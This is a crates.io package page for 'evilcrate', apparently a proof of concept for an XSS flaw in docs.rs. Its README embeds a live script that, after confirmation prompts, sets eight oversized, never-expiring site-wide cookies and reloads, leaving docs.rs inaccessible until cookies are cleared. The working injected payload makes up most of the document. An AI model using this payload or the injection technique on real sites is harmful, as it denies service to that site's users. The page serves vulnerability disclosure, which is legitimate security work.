evilcrate

Demonstration of an XSS vulnerability. Clear cookies afterwards.

3 releases

0.1.2 Mar 21, 2021
0.1.1 Mar 21, 2021
0.1.0 Mar 21, 2021

#5 in #demonstration

MIT license

3KB

🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥

This crate demonstrates an XSS vulnerability of docs.rs. To test, click the link below. In order to access docs.rs afterward, you will need to clear cookies.

🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥

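<script>
function bootstrap() {
  // Three confirmation dialogs and a typed phrase gate the demonstration;
  // cancelling any of them aborts before anything is changed.
  const doc1 = 'This is a demonstration of a security vulnerability (XSS). Click CANCEL to abort at any time.';
  const doc2 = 'WARNING: If you proceed, you will not be able to access docs.rs. CLICK CANCEL if you do not wish this to happen.';
  const doc3 = 'WARNING: To access docs.rs after proceeding, you will need to clear your browser cookies.';
  if (!confirm(doc1) || !confirm(doc2) || !confirm(doc3)) {
    return;
  }
  if (prompt('Type "I understand what I need to do" to continue:') !== "I understand what I need to do") {
    return;
  }

  // Build a cookie value of 4001 'z' characters (about 4 KB).
  let z = 'z';
  for (let i = 0; i < 4000; i++) {
    z = z + 'z';
  }

  // Store the oversized value under the given name, site-wide (Path=/),
  // with an expiry date far in the future.
  function setCookie(name) {
    document.cookie = name + '=' + z + '; expires=Fri, 31 Dec 9999 23:59:59 GMT; Path=/';
  }

  // Eight such cookies mean every later request to the site carries roughly
  // 32 KB of Cookie header; the README states docs.rs stays inaccessible
  // until the cookies are cleared.
  ['a','b','c','d','e','f','g','h'].forEach(setCookie);
  window.location.reload();
}
</script>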

No runtime deps